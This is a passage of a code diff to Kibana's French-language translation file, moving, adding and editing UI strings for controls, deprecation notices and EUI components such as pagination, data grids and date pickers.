"Les modifications apportées à ce contrôle seront ignorées. Voulez-vous vraiment continuer ?", - "controls.controlGroup.management.discard.title": "Abandonner les modifications ?", + "controls.controlGroup.management.discard.sub": "Les modifications apportées à ce contrôle seront ignorées. 
Voulez-vous vraiment continuer ?", + "controls.controlGroup.management.discard.title": "Abandonner les modifications ?", "controls.controlGroup.management.flyoutTitle": "Paramètres du contrôle", "controls.controlGroup.management.hierarchy.subtitle": "Les sélections dans un contrôle diminuent les options disponibles dans le suivant. Les contrôles se suivent de gauche à droite.", "controls.controlGroup.management.hierarchy.title": "Contrôles à la suite", 
@@ -1312,19 +379,12 @@ "controls.optionsList.editor.allowMultiselectTitle": "Permettre des sélections multiples dans une liste déroulante", "controls.optionsList.editor.runPastTimeout": "Exécuter après expiration du délai", "controls.optionsList.popover.allOptionsTitle": "Afficher toutes les options", - "controls.optionsList.popover.cardinalityPlaceholder": "Rechercher {totalOptions} {totalOptions, plural, one {option disponible} other {options disponibles}}", - "controls.optionsList.popover.cardinalityTooltip": "{totalOptions} options disponibles.", "controls.optionsList.popover.clearAllSelectionsTitle": "Effacer les sélections", "controls.optionsList.popover.empty": "Aucune option trouvée", "controls.optionsList.popover.invalidSelectionsAriaLabel": "Désélectionnez toutes les sélections ignorées", - "controls.optionsList.popover.invalidSelectionsSectionTitle": "{invalidSelectionCount, plural, one {Sélection ignorée} other {Sélections ignorées}}", - "controls.optionsList.popover.invalidSelectionsTitle": "{invalidSelectionCount} options sélectionnées ignorées", - "controls.optionsList.popover.invalidSelectionsTooltip": "{selectedOptions} {selectedOptions, plural, one {option sélectionnée} other {options sélectionnées}} {selectedOptions, plural, one {est ignorée} other {sont ignorées}}, car {selectedOptions, plural, one {elle n'est plus présente} other {elles ne sont plus présentes}} dans les données.", "controls.optionsList.popover.loading": "Options de chargement", "controls.optionsList.popover.selectedOptionsTitle": "Afficher uniquement les options sélectionnées", "controls.optionsList.popover.selectionsEmpty": "Vous n'avez pas de sélections", - "controls.optionsList.control.placeholder": "Sélectionner…", - "controls.optionsList.control.separator": ", ", "controls.rangeSlider.description": "Ajoutez un contrôle pour la sélection d'une plage de valeurs de champ.", "controls.rangeSlider.displayName": "Curseur de plage", "controls.rangeSlider.editor.dataViewTitle": 
"Vue de données", 
@@ -1342,40 +402,154 @@ "controls.timeSlider.editor.noDataViewTitle": "Sélectionner la vue de données", "controls.timeSlider.noDocuments.label": "Aucun document n'a été trouvé. Sélection de plage non disponible.", "controls.timeSlider.resetButton.label": "Réinitialiser les sélections", + "core.chrome.browserDeprecationWarning": "La prise en charge d'Internet Explorer sera abandonnée dans les futures versions de ce logiciel. Veuillez consulter le site {link}.", + "core.deprecations.deprecations.fetchFailedMessage": "Impossible d'extraire les informations de déclassement pour le plug-in {domainId}.", + "core.deprecations.deprecations.fetchFailedTitle": "Impossible d'extraire les déclassements pour {domainId}", + "core.deprecations.elasticsearchSSL.manualSteps1": "Ajoutez le paramètre \"{missingSetting}\" à kibana.yml.", + "core.deprecations.elasticsearchSSL.manualSteps2": "Si vous ne souhaitez pas utiliser l'authentification TLS mutuelle, vous pouvez aussi supprimer \"{existingSetting}\" dans kibana.yml.", + "core.deprecations.elasticsearchSSL.message": "Utilisez à la fois \"{existingSetting}\" et \"{missingSetting}\" afin d'activer Kibana pour utiliser l'authentification TLS mutuelle avec Elasticsearch.", + "core.deprecations.elasticsearchSSL.title": "L'utilisation de \"{existingSetting}\" sans \"{missingSetting}\" n'a pas d'effet", + "core.deprecations.elasticsearchUsername.message": "Kibana est configuré pour l'authentification sur Elasticsearch avec l'utilisateur \"{username}\". 
Utilisez plutôt un jeton de compte de service.", + "core.deprecations.elasticsearchUsername.title": "L'utilisation de \"elasticsearch.username: {username}\" est déclassée", + "core.euiAbsoluteTab.dateFormatError": "Format attendu : {dateFormat}", + "core.euiAutoRefresh.buttonLabelOn": "L'actualisation automatique est activée et définie sur {prettyInterval}", + "core.euiBasicTable.tableAutoCaptionWithoutPagination": "Ce tableau contient {itemCount} lignes.", + "core.euiBasicTable.tableAutoCaptionWithPagination": "Ce tableau contient {itemCount} lignes sur {totalItemCount} lignes au total ; page {page} sur {pageCount}.", + "core.euiBasicTable.tableCaptionWithPagination": "{tableCaption} ; page {page} sur {pageCount}.", + "core.euiBasicTable.tablePagination": "Pagination pour le tableau : {tableCaption}", + "core.euiBasicTable.tableSimpleAutoCaptionWithPagination": "Ce tableau contient {itemCount} lignes ; page {page} sur {pageCount}.", + "core.euiBottomBar.customScreenReaderAnnouncement": "Il y a un nouveau repère de région nommé {landmarkHeading} avec des commandes de niveau de page à la fin du document.", + "core.euiColorPickerSwatch.ariaLabel": "Sélection de la couleur {color}", + "core.euiColorStops.screenReaderAnnouncement": "{label} : {readOnly} {disabled} Sélecteur d'arrêt de couleur. Chaque arrêt consiste en un nombre et en une valeur de couleur correspondante. Utilisez les flèches haut et bas pour sélectionner les arrêts. 
Appuyez sur Entrée pour créer un nouvel arrêt.", + "core.euiColumnActions.sort": "Trier {schemaLabel}", + "core.euiColumnSelector.buttonActivePlural": "{numberOfHiddenFields} colonnes masquées", + "core.euiColumnSelector.buttonActiveSingular": "{numberOfHiddenFields} colonne masquée", + "core.euiColumnSorting.buttonActive": "{numberOfSortedFields, plural, one {# champ trié} other {# champs triés}}", + "core.euiColumnSortingDraggable.activeSortLabel": "{display} trie cette grille de données", + "core.euiColumnSortingDraggable.removeSortLabel": "Retirer {display} du tri de la grille de données", + "core.euiColumnSortingDraggable.toggleLegend": "Sélectionner la méthode de tri pour {display}", + "core.euiComboBoxOptionsList.alreadyAdded": "{label} a déjà été ajouté.", + "core.euiComboBoxOptionsList.createCustomOption": "Ajouter {searchValue} en tant qu'option personnalisée", + "core.euiComboBoxOptionsList.delimiterMessage": "Ajouter chaque élément en séparant par {delimiter}", + "core.euiComboBoxOptionsList.noMatchingOptions": "{searchValue} ne correspond à aucune option.", + "core.euiComboBoxPill.removeSelection": "Supprimer {children} de la sélection de ce groupe", + "core.euiControlBar.customScreenReaderAnnouncement": "Il y a un nouveau repère de région nommé {landmarkHeading} avec des commandes de niveau de page à la fin du document.", + "core.euiDataGrid.ariaLabel": "{label} ; page {page} sur {pageCount}.", + "core.euiDataGrid.ariaLabelledBy": "Page {page} sur {pageCount}.", + "core.euiDataGridCell.position": "{columnId}, colonne {col}, ligne {row}", + "core.euiDataGridPagination.detailedPaginationLabel": "Pagination pour la grille précédente : {label}", + "core.euiDatePopoverButton.invalidTitle": "Date non valide : {title}", + "core.euiDatePopoverButton.outdatedTitle": "Mise à jour requise : {title}", + "core.euiFilePicker.filesSelected": "{fileCount} fichiers sélectionnés", + "core.euiFilterButton.filterBadgeActiveAriaLabel": "{count} filtres actifs", + 
"core.euiFilterButton.filterBadgeAvailableAriaLabel": "{count} filtres disponibles", + "core.euiMarkdownEditorFooter.supportedFileTypes": "Fichiers pris en charge : {supportedFileTypes}", + "core.euiNotificationEventMessages.accordionAriaLabelButtonText": "+ {messagesLength} messages pour {eventName}", + "core.euiNotificationEventMessages.accordionButtonText": "+ {messagesLength} de plus", + "core.euiNotificationEventMeta.contextMenuButton": "Menu pour {eventName}", + "core.euiNotificationEventReadButton.markAsReadAria": "Marquer {eventName} comme lu", + "core.euiNotificationEventReadButton.markAsUnreadAria": "Marquer {eventName} comme non lu", + "core.euiNotificationEventReadIcon.readAria": "{eventName} lu", + "core.euiNotificationEventReadIcon.unreadAria": "{eventName} non lu", + "core.euiPagination.firstRangeAriaLabel": "Ignorer les pages 2 à {lastPage}", + "core.euiPagination.lastRangeAriaLabel": "Ignorer les pages {firstPage} à {lastPage}", + "core.euiPagination.pageOfTotalCompressed": "{page} sur {total}", + "core.euiPaginationButton.longPageString": "Page {page} sur {totalPages}", + "core.euiPaginationButton.shortPageString": "Page {page}", + "core.euiPrettyDuration.durationRoundedToDay": "{prettyDuration} arrondie au jour", + "core.euiPrettyDuration.durationRoundedToHour": "{prettyDuration} arrondie à l'heure", + "core.euiPrettyDuration.durationRoundedToMinute": "{prettyDuration} arrondie à la minute", + "core.euiPrettyDuration.durationRoundedToMonth": "{prettyDuration} arrondie au mois", + "core.euiPrettyDuration.durationRoundedToSecond": "{prettyDuration} arrondie à la seconde", + "core.euiPrettyDuration.durationRoundedToWeek": "{prettyDuration} arrondie à la semaine", + "core.euiPrettyDuration.durationRoundedToYear": "{prettyDuration} arrondie à l'année", + "core.euiPrettyDuration.fallbackDuration": "{displayFrom} à {displayTo}", + "core.euiPrettyDuration.lastDurationDays": "{duration, plural, one {# dernier jour} other {# derniers jours}}", + 
"core.euiPrettyDuration.lastDurationHours": "{duration, plural, one {# dernière heure} other {# dernières heures}}", + "core.euiPrettyDuration.lastDurationMinutes": "{duration, plural, one {# dernière minute} other {# dernières minutes}}", + "core.euiPrettyDuration.lastDurationMonths": "{duration, plural, one {# dernier mois} other {# derniers mois}}", + "core.euiPrettyDuration.lastDurationSeconds": "{duration, plural, one {# dernière seconde} other {# dernières secondes}}", + "core.euiPrettyDuration.lastDurationWeeks": "{duration, plural, one {# dernière semaine} other {# dernières semaines}}", + "core.euiPrettyDuration.lastDurationYears": "{duration, plural, one {# dernière année} other {# dernières années}}", + "core.euiPrettyDuration.nextDurationHours": "{duration, plural, one {# prochaine heure} other {# prochaines heures}}", + "core.euiPrettyDuration.nextDurationMinutes": "{duration, plural, one {# prochaine minute} other {# prochaines minutes}}", + "core.euiPrettyDuration.nextDurationMonths": "{duration, plural, one {# prochain mois} other {# prochains mois}}", + "core.euiPrettyDuration.nextDurationSeconds": "{duration, plural, one {# prochaine seconde} other {# prochaines secondes}}", + "core.euiPrettyDuration.nextDurationWeeks": "{duration, plural, one {# prochaine semaine} other {# prochaines semaines}}", + "core.euiPrettyDuration.nextDurationYears": "{duration, plural, one {# prochaine année} other {# prochaines années}}", + "core.euiPrettyDuration.nexttDurationDays": "{duration, plural, one {# prochain jour} other {# prochains jours}}", + "core.euiPrettyInterval.days": "{interval, plural, one {# jour} other {# jours}}", + "core.euiPrettyInterval.daysShorthand": "{interval} d", + "core.euiPrettyInterval.hours": "{interval, plural, one {# heure} other {# heures}}", + "core.euiPrettyInterval.hoursShorthand": "{interval} h", + "core.euiPrettyInterval.minutes": "{interval, plural, one {# minute} other {# minutes}}", + 
"core.euiPrettyInterval.minutesShorthand": "{interval} m", + "core.euiPrettyInterval.seconds": "{interval, plural, one {# seconde} other {# secondes}}", + "core.euiPrettyInterval.secondsShorthand": "{interval} s", + "core.euiProgress.valueText": "{value} %", + "core.euiQuickSelect.fullDescription": "Actuellement défini sur {timeTense} {timeValue} {timeUnit}.", + "core.euiRefreshInterval.fullDescriptionOff": "L'actualisation est désactivée, intervalle défini sur {optionValue} {optionText}.", + "core.euiRefreshInterval.fullDescriptionOn": "L'actualisation est activée, intervalle défini sur {optionValue} {optionText}.", + "core.euiRelativeTab.fullDescription": "L'unité peut être modifiée. Elle est actuellement définie sur {unit}.", + "core.euiSelectable.noMatchingOptions": "{searchValue} ne correspond à aucune option.", + "core.euiSelectable.searchResults": "{resultsLength, plural, one {# résultat disponible} other {#résultats disponibles}}", + "core.euiStepStrings.complete": "L'étape {number} : {title} est terminée.", + "core.euiStepStrings.current": "L’étape {number} : {title} est en cours.", + "core.euiStepStrings.disabled": "L'étape {number} : {title} est désactivée.", + "core.euiStepStrings.errors": "L'étape {number} : {title} contient des erreurs.", + "core.euiStepStrings.incomplete": "L'étape {number} : {title} est incomplète.", + "core.euiStepStrings.loading": "L'étape {number} : {title} est en cours de chargement.", + "core.euiStepStrings.simpleComplete": "L'étape {number} est terminée.", + "core.euiStepStrings.simpleCurrent": "L’étape {number} est en cours.", + "core.euiStepStrings.simpleDisabled": "L'étape {number} est désactivée.", + "core.euiStepStrings.simpleErrors": "L'étape {number} contient des erreurs.", + "core.euiStepStrings.simpleIncomplete": "L'étape {number} est incomplète.", + "core.euiStepStrings.simpleLoading": "L'étape {number} est en cours de chargement.", + "core.euiStepStrings.simpleStep": "Étape {number}", + 
"core.euiStepStrings.simpleWarning": "L'étape {number} contient des avertissements.", + "core.euiStepStrings.step": "Étape {number} : {title}", + "core.euiStepStrings.warning": "L'étape {number} : {title} contient des avertissements.", + "core.euiSuperSelectControl.selectAnOption": "Sélectionner une option : l’option {selectedValue} est sélectionnée.", + "core.euiTableHeaderCell.titleTextWithDesc": "{innerText} ; {description}", + "core.euiTablePagination.rowsPerPageOption": "{rowsPerPage} lignes", + "core.euiTourStepIndicator.ariaLabel": "Étape {number} {status}", + "core.euiTreeView.ariaLabel": "{nodeLabel} enfant de {ariaLabel}", + "core.savedObjects.deprecations.unknownTypes.message": "{objectCount, plural, one {# objet} other {# objets}} de type inconnu {objectCount, plural, one {a été trouvé} other {ont été trouvés}} dans les indices du système Kibana. La mise à niveau avec des types savedObject inconnus n'est plus compatible. Pour assurer la réussite des mises à niveau à l'avenir, réactivez les plug-ins ou supprimez ces documents dans les indices de Kibana", + "core.statusPage.loadStatus.serverStatusCodeErrorMessage": "Échec de requête du statut du serveur avec le code de statut {responseStatus}.", + "core.statusPage.serverStatus.statusTitle": "Statut Kibana : {kibanaStatus}", + "core.statusPage.statusApp.statusActions.buildText": "BUILD : {buildNum}", + "core.statusPage.statusApp.statusActions.commitText": "COMMIT : {buildSha}", + "core.statusPage.statusApp.statusActions.versionText": "VERSION : {versionNum}", + "core.ui_settings.params.dateFormat.scaledText": "Les valeurs qui définissent le format utilisé lorsque les données temporelles sont rendues dans l'ordre, et lorsque les horodatages formatés doivent s'adapter à l'intervalle entre les mesures. 
Les clés sont {intervalsLink}.", + "core.ui_settings.params.dateFormat.timezone.invalidValidationMessage": "Fuseau horaire non valide : {timezone}", + "core.ui_settings.params.dateFormatText": "Le {formatLink} pour des dates joliment formatées.", + "core.ui_settings.params.dateNanosFormatText": "Le format pour les données {dateNanosLink}.", + "core.ui_settings.params.dayOfWeekText.invalidValidationMessage": "Jour de la semaine non valide : {dayOfWeek}", + "core.ui_settings.params.notifications.bannerText": "Une bannière personnalisée à des fins de notification temporaire de l’ensemble des utilisateurs. {markdownLink}.", + "core.ui.chrome.headerGlobalNav.helpMenuGiveFeedbackOnApp": "Donner un retour sur {appName}", + "core.ui.chrome.headerGlobalNav.helpMenuVersion": "v {version}", + "core.ui.errorUrlOverflow.bigUrlWarningNotificationMessage": "Activez l'option {storeInSessionStorageParam} dans les {advancedSettingsLink} ou simplifiez les visuels à l'écran.", + "core.ui.errorUrlOverflow.optionsToFixError.enableOptionText": "Activez l'option {storeInSessionStorageConfig} sous {kibanaSettingsLink}.", + "core.ui.primaryNavSection.screenReaderLabel": "Liens de navigation principale, {category}", + "core.ui.publicBaseUrlWarning.configRecommendedDescription": "Dans un environnement de production, il est recommandé de configurer {configKey}.", + "core.ui.recentLinks.linkItem.screenReaderLabel": "{recentlyAccessedItemLinklabel}, type : {pageType}", "core.application.appContainer.loadingAriaLabel": "Chargement de l'application", "core.application.appNotFound.pageDescription": "Aucune application détectée pour cette URL. 
Revenez en arrière ou sélectionnez une application dans le menu.", "core.application.appNotFound.title": "Application introuvable", "core.application.appRenderError.defaultTitle": "Erreur d'application", - "core.chrome.browserDeprecationLink": "la matrice de prise en charge sur notre site web", - "core.chrome.browserDeprecationWarning": "La prise en charge d'Internet Explorer sera abandonnée dans les futures versions de ce logiciel. Veuillez consulter le site {link}.", + "core.chrome.browserDeprecationLink": "la matrice de prise en charge sur notre site web", "core.chrome.legacyBrowserWarning": "Votre navigateur ne satisfait pas aux exigences de sécurité de Kibana.", "core.deprecations.deprecations.fetchFailed.manualStepOneMessage": "Vérifiez le message d'erreur dans les logs de serveur Kibana.", - "core.deprecations.deprecations.fetchFailedMessage": "Impossible d'extraire les informations de déclassement pour le plug-in {domainId}.", - "core.deprecations.deprecations.fetchFailedTitle": "Impossible d'extraire les déclassements pour {domainId}", - "core.deprecations.elasticsearchSSL.manualSteps1": "Ajoutez le paramètre \"{missingSetting}\" à kibana.yml.", - "core.deprecations.elasticsearchSSL.manualSteps2": "Si vous ne souhaitez pas utiliser l'authentification TLS mutuelle, vous pouvez aussi supprimer \"{existingSetting}\" dans kibana.yml.", - "core.deprecations.elasticsearchSSL.message": "Utilisez à la fois \"{existingSetting}\" et \"{missingSetting}\" afin d'activer Kibana pour utiliser l'authentification TLS mutuelle avec Elasticsearch.", - "core.deprecations.elasticsearchSSL.title": "L'utilisation de \"{existingSetting}\" sans \"{missingSetting}\" n'a pas d'effet", "core.deprecations.elasticsearchUsername.manualSteps1": "Utilisez l'outil CLI elasticsearch-service-tokens afin de créer un jeton pour le compte de service \"elastic/kibana\".", "core.deprecations.elasticsearchUsername.manualSteps2": "Ajoutez le paramètre \"elasticsearch.serviceAccountToken\" à 
kibana.yml.", "core.deprecations.elasticsearchUsername.manualSteps3": "Supprimez \"elasticsearch.username\" et \"elasticsearch.password\" de kibana.yml.", - "core.deprecations.elasticsearchUsername.message": "Kibana est configuré pour l'authentification sur Elasticsearch avec l'utilisateur \"{username}\". Utilisez plutôt un jeton de compte de service.", - "core.deprecations.elasticsearchUsername.title": "L'utilisation de \"elasticsearch.username: {username}\" est déclassée", "core.deprecations.noCorrectiveAction": "Ce déclassement ne peut pas être résolu automatiquement.", - "core.euiAbsoluteTab.dateFormatError": "Format attendu : {dateFormat}", "core.euiAccordion.isLoading": "Chargement", "core.euiAutoRefresh.autoRefreshLabel": "Actualisation automatique", "core.euiAutoRefresh.buttonLabelOff": "L'actualisation automatique est désactivée", - "core.euiAutoRefresh.buttonLabelOn": "L'actualisation automatique est activée et définie sur {prettyInterval}", "core.euiBasicTable.noItemsMessage": "Aucun élément n'a été trouvé", "core.euiBasicTable.selectAllRows": "Sélectionner toutes les lignes", "core.euiBasicTable.selectThisRow": "Sélectionner cette ligne", - "core.euiBasicTable.tableAutoCaptionWithoutPagination": "Ce tableau contient {itemCount} lignes.", - "core.euiBasicTable.tableAutoCaptionWithPagination": "Ce tableau contient {itemCount} lignes sur {totalItemCount} lignes au total ; page {page} sur {pageCount}.", - "core.euiBasicTable.tableCaptionWithPagination": "{tableCaption} ; page {page} sur {pageCount}.", - "core.euiBasicTable.tablePagination": "Pagination pour le tableau : {tableCaption}", - "core.euiBasicTable.tableSimpleAutoCaptionWithPagination": "Ce tableau contient {itemCount} lignes ; page {page} sur {pageCount}.", - "core.euiBottomBar.customScreenReaderAnnouncement": "Il y a un nouveau repère de région nommé {landmarkHeading} avec des commandes de niveau de page à la fin du document.", "core.euiBottomBar.screenReaderAnnouncement": "Il y a un nouveau 
repère de région avec des commandes de niveau de page à la fin du document.", "core.euiBottomBar.screenReaderHeading": "Commandes de niveau de page", "core.euiBreadcrumbs.collapsedBadge.ariaLabel": "Voir le fil d’Ariane réduit", @@ -1394,8 +568,6 @@ "core.euiColorPicker.openLabel": "Appuyez sur Échap pour fermer la fenêtre contextuelle.", "core.euiColorPicker.popoverLabel": "Boîte de dialogue de sélection de couleur", "core.euiColorPicker.transparent": "Transparent", - "core.euiColorPickerSwatch.ariaLabel": "Sélection de la couleur {color}", - "core.euiColorStops.screenReaderAnnouncement": "{label} : {readOnly} {disabled} Sélecteur d'arrêt de couleur. Chaque arrêt consiste en un nombre et en une valeur de couleur correspondante. Utilisez les flèches haut et bas pour sélectionner les arrêts. Appuyez sur Entrée pour créer un nouvel arrêt.", "core.euiColorStopThumb.buttonAriaLabel": "Appuyez sur Entrée pour modifier cet arrêt. Appuyez sur Échap pour revenir au groupe.", "core.euiColorStopThumb.buttonTitle": "Cliquez pour modifier, faites glisser pour repositionner.", "core.euiColorStopThumb.removeLabel": "Supprimer cet arrêt", 
@@ -1405,44 +577,30 @@ "core.euiColumnActions.hideColumn": "Masquer la colonne", "core.euiColumnActions.moveLeft": "Déplacer vers la gauche", "core.euiColumnActions.moveRight": "Déplacer vers la droite", - "core.euiColumnActions.sort": "Trier {schemaLabel}", "core.euiColumnSelector.button": "Colonnes", - "core.euiColumnSelector.buttonActivePlural": "{numberOfHiddenFields} colonnes masquées", - "core.euiColumnSelector.buttonActiveSingular": "{numberOfHiddenFields} colonne masquée", "core.euiColumnSelector.hideAll": "Tout masquer", "core.euiColumnSelector.search": "Recherche", "core.euiColumnSelector.searchcolumns": "Rechercher dans les colonnes", "core.euiColumnSelector.selectAll": "Afficher tout", "core.euiColumnSorting.button": "Trier les champs", - "core.euiColumnSorting.buttonActive": "{numberOfSortedFields, plural, one {# champ trié} other {# champs triés}}", "core.euiColumnSorting.clearAll": "Annuler le tri", "core.euiColumnSorting.emptySorting": "Aucun champ n'est trié actuellement.", "core.euiColumnSorting.pickFields": "Sélectionner les champs de tri", - "core.euiColumnSorting.sortFieldAriaLabel": "Trier par :", - "core.euiColumnSortingDraggable.activeSortLabel": "{display} trie cette grille de données", + "core.euiColumnSorting.sortFieldAriaLabel": "Trier par :", "core.euiColumnSortingDraggable.defaultSortAsc": "A-Z", "core.euiColumnSortingDraggable.defaultSortDesc": "Z-A", - "core.euiColumnSortingDraggable.removeSortLabel": "Retirer {display} du tri de la grille de données", - "core.euiColumnSortingDraggable.toggleLegend": "Sélectionner la méthode de tri pour {display}", + "core.euiColumnSortingDraggable.dragHandleAriaLabel": "Faire glisser la poignée", "core.euiComboBox.listboxAriaLabel": "Faites votre choix parmi les options suivantes", "core.euiComboBoxOptionsList.allOptionsSelected": "Vous avez sélectionné toutes les options disponibles.", - "core.euiComboBoxOptionsList.alreadyAdded": "{label} a déjà été ajouté.", - 
"core.euiComboBoxOptionsList.createCustomOption": "Ajouter {searchValue} en tant qu'option personnalisée", - "core.euiComboBoxOptionsList.delimiterMessage": "Ajouter chaque élément en séparant par {delimiter}", "core.euiComboBoxOptionsList.loadingOptions": "Options de chargement", "core.euiComboBoxOptionsList.noAvailableOptions": "Aucune option n’est disponible.", - "core.euiComboBoxOptionsList.noMatchingOptions": "{searchValue} ne correspond à aucune option.", - "core.euiComboBoxPill.removeSelection": "Supprimer {children} de la sélection de ce groupe", "core.euiCommonlyUsedTimeRanges.legend": "Couramment utilisées", - "core.euiControlBar.customScreenReaderAnnouncement": "Il y a un nouveau repère de région nommé {landmarkHeading} avec des commandes de niveau de page à la fin du document.", "core.euiControlBar.screenReaderAnnouncement": "Il y a un nouveau repère de région avec des commandes de niveau de page à la fin du document.", "core.euiControlBar.screenReaderHeading": "Commandes de niveau de page", - "core.euiDataGrid.ariaLabel": "{label} ; page {page} sur {pageCount}.", - "core.euiDataGrid.ariaLabelledBy": "Page {page} sur {pageCount}.", "core.euiDataGrid.screenReaderNotice": "Cette cellule contient du contenu interactif.", "core.euiDataGridCellActions.expandButtonTitle": "Cliquez ou appuyez sur Entrée pour interagir avec le contenu de la cellule.", + "core.euiDataGridHeaderCell.actionsPopoverScreenReaderText": "Pour naviguer dans la liste des actions de la colonne, appuyez sur la touche Tab ou sur les flèches vers le haut et vers le bas.", "core.euiDataGridHeaderCell.headerActions": "Actions d'en-tête", - "core.euiDataGridPagination.detailedPaginationLabel": "Pagination pour la grille précédente : {label}", "core.euiDataGridPagination.paginationLabel": "Pagination pour la grille précédente", "core.euiDataGridSchema.booleanSortTextAsc": "Faux-Vrai", "core.euiDataGridSchema.booleanSortTextDesc": "Vrai-Faux", 
@@ -1454,8 +612,6 @@ "core.euiDataGridSchema.jsonSortTextDesc": "Grand-Petit", "core.euiDataGridSchema.numberSortTextAsc": "Bas-Haut", "core.euiDataGridSchema.numberSortTextDesc": "Haut-Bas", - "core.euiDatePopoverButton.invalidTitle": "Date non valide : {title}", - "core.euiDatePopoverButton.outdatedTitle": "Mise à jour requise : {title}", "core.euiDatePopoverContent.absoluteTabLabel": "Absolue", "core.euiDatePopoverContent.endDateLabel": "Date de fin", "core.euiDatePopoverContent.nowTabButtonEnd": "Définir les date et heure de fin sur Maintenant", @@ -1477,13 +633,10 @@ "core.euiDisplaySelector.rowHeightLabel": "Hauteur de la ligne", "core.euiErrorBoundary.error": "Erreur", "core.euiFieldPassword.maskPassword": "Masquer le mot de passe", - "core.euiFieldPassword.showPassword": "Afficher le mot de passe en texte brut. Remarque : votre mot de passe sera visible à l'écran.", + "core.euiFieldPassword.showPassword": "Afficher le mot de passe en texte brut. Remarque : votre mot de passe sera visible à l'écran.", "core.euiFilePicker.clearSelectedFiles": "Effacer les fichiers sélectionnés", - "core.euiFilePicker.filesSelected": "{fileCount} fichiers sélectionnés", "core.euiFilePicker.promptText": "Sélectionner ou glisser-déposer un fichier", "core.euiFilePicker.removeSelected": "Supprimer", - "core.euiFilterButton.filterBadgeActiveAriaLabel": "{count} filtres actifs", - "core.euiFilterButton.filterBadgeAvailableAriaLabel": "{count} filtres disponibles", "core.euiFlyout.closeAriaLabel": "Fermer cette boîte de dialogue", "core.euiForm.addressFormErrors": "Veuillez remédier aux erreurs signalées en surbrillance.", "core.euiFormControlLayoutClearButton.label": "Effacer l'entrée", 
@@ -1491,10 +644,11 @@ "core.euiFullscreenSelector.fullscreenButtonActive": "Quitter le mode plein écran", "core.euiHeaderLinks.appNavigation": "Menu de l'application", "core.euiHeaderLinks.openNavigationMenu": "Ouvrir le menu", - "core.euiHue.label": "Sélectionner la valeur \"hue\" du mode de couleur HSV", + "core.euiHue.label": "Sélectionner la valeur \"hue\" du mode de couleur HSV", "core.euiLink.external.ariaLabel": "Lien externe", "core.euiLink.newTarget.screenReaderOnlyText": "(s’ouvre dans un nouvel onglet ou une nouvelle fenêtre)", "core.euiLoadingChart.ariaLabel": "Chargement", + "core.euiLoadingStrings.ariaLabel": "Chargement", "core.euiMark.highlightEnd": "mettre la fin en surbrillance", "core.euiMark.highlightStart": "mettre le début en surbrillance", "core.euiMarkdownEditorFooter.closeButton": "Fermer", @@ -1503,7 +657,6 @@ "core.euiMarkdownEditorFooter.openUploadModal": "Activer le mode de chargement de fichiers", "core.euiMarkdownEditorFooter.showMarkdownHelp": "Afficher l'aide de Markdown", "core.euiMarkdownEditorFooter.showSyntaxErrors": "Afficher les erreurs", - "core.euiMarkdownEditorFooter.supportedFileTypes": "Fichiers pris en charge : {supportedFileTypes}", "core.euiMarkdownEditorFooter.syntaxModalDescriptionPrefix": "Cet éditeur utilise", "core.euiMarkdownEditorFooter.syntaxModalDescriptionSuffix": "Vous pouvez également utiliser ces plug-ins de syntaxe supplémentaires pour enrichir votre texte.", "core.euiMarkdownEditorFooter.syntaxPopoverDescription": "Cet éditeur utilise", 
@@ -1513,28 +666,16 @@ "core.euiMarkdownEditorToolbar.editor": "Éditeur", "core.euiMarkdownEditorToolbar.previewMarkdown": "Aperçu", "core.euiModal.closeModal": "Ferme cette fenêtre modale.", - "core.euiNotificationEventMessages.accordionAriaLabelButtonText": "+ {messagesLength} messages pour {eventName}", - "core.euiNotificationEventMessages.accordionButtonText": "+ {messagesLength} de plus", "core.euiNotificationEventMessages.accordionHideText": "masquer", - "core.euiNotificationEventMeta.contextMenuButton": "Menu pour {eventName}", "core.euiNotificationEventReadButton.markAsRead": "Marquer comme lu", - "core.euiNotificationEventReadButton.markAsReadAria": "Marquer {eventName} comme lu", "core.euiNotificationEventReadButton.markAsUnread": "Marquer comme non lu", - "core.euiNotificationEventReadButton.markAsUnreadAria": "Marquer {eventName} comme non lu", - "core.euiNotificationEventReadIcon.read": "Lu", - "core.euiNotificationEventReadIcon.readAria": "{eventName} lu", + "core.euiNotificationEventReadIcon.read": "Lire", "core.euiNotificationEventReadIcon.unread": "Non lu", - "core.euiNotificationEventReadIcon.unreadAria": "{eventName} non lu", "core.euiPagination.collection": "collection", - "core.euiPagination.firstRangeAriaLabel": "Ignorer les pages 2 à {lastPage}", "core.euiPagination.fromEndLabel": "à partir de la fin", "core.euiPagination.last": "Dernier", - "core.euiPagination.lastRangeAriaLabel": "Ignorer les pages {firstPage} à {lastPage}", "core.euiPagination.of": "de", "core.euiPagination.page": "Page", - "core.euiPagination.pageOfTotalCompressed": "{page} sur {total}", - "core.euiPaginationButton.longPageString": "Page {page} sur {totalPages}", - "core.euiPaginationButton.shortPageString": "Page {page}", "core.euiPaginationButtonArrow.firstPage": "Première page", "core.euiPaginationButtonArrow.lastPage": "Dernière page", "core.euiPaginationButtonArrow.nextPage": "Page suivante", 
@@ -1542,42 +683,10 @@ "core.euiPinnableListGroup.pinExtraActionLabel": "Épingler l'élément", "core.euiPinnableListGroup.pinnedExtraActionLabel": "Désépingler l'élément", "core.euiPopover.screenReaderAnnouncement": "Il s’agit d’une boîte de dialogue. Appuyez sur Échap pour quitter.", - "core.euiPrettyDuration.durationRoundedToDay": "{prettyDuration} arrondie au jour", - "core.euiPrettyDuration.durationRoundedToHour": "{prettyDuration} arrondie à l'heure", - "core.euiPrettyDuration.durationRoundedToMinute": "{prettyDuration} arrondie à la minute", - "core.euiPrettyDuration.durationRoundedToMonth": "{prettyDuration} arrondie au mois", - "core.euiPrettyDuration.durationRoundedToSecond": "{prettyDuration} arrondie à la seconde", - "core.euiPrettyDuration.durationRoundedToWeek": "{prettyDuration} arrondie à la semaine", - "core.euiPrettyDuration.durationRoundedToYear": "{prettyDuration} arrondie à l'année", - "core.euiPrettyDuration.fallbackDuration": "{displayFrom} à {displayTo}", "core.euiPrettyDuration.invalid": "Date non valide", - "core.euiPrettyDuration.lastDurationDays": "{duration, plural, one {# dernier jour} other {# derniers jours}}", - "core.euiPrettyDuration.lastDurationHours": "{duration, plural, one {# dernière heure} other {# dernières heures}}", - "core.euiPrettyDuration.lastDurationMinutes": "{duration, plural, one {# dernière minute} other {# dernières minutes}}", - "core.euiPrettyDuration.lastDurationMonths": "{duration, plural, one {# dernier mois} other {# derniers mois}}", - "core.euiPrettyDuration.lastDurationSeconds": "{duration, plural, one {# dernière seconde} other {# dernières secondes}}", - "core.euiPrettyDuration.lastDurationWeeks": "{duration, plural, one {# dernière semaine} other 